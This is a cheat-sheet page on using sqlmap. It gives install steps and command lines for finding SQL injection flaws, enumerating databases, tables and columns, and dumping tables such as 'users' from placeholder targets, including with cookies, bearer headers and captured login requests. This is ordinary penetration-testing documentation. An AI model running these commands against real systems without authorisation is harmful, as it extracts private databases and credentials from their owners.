Sqlmap
2017-11-28 19:00:01
Documentation
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. more here: http://sqlmap.org/
Installation
apt-get install -y sqlmap
Docker image with pre installed tool
https://hub.docker.com/r/szalek/pentest-tools/
docker pull szalek/pentest-tools
docker run -it szalek/pentest-tools
Target
http://target.localhost/rest/ws-user-account.php?username=szalek
Sqlmap basic
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --dbs
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB\_NAME} --tables
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE-NAME} --columns
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE\_NAME} --dump
with cookie
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --cookie "JSESSIONID=C59D9452BBE59FC357A1D0E62E8646A4" --dbs
with header
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --headers="Authorization: Bearer fyJhabcGiOJI..." --dbs
post
/sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" --dbs
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -D shop --tables
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -T users --dump
post
login_request_dump.txt
POST /login.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.14/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: close
Upgrade-Insecure-Requests: 1
email=admin&password=admin
sqlmap -r login\_request\_dump.txt -p email
sqlmap -r login\_request\_dump.txt -p password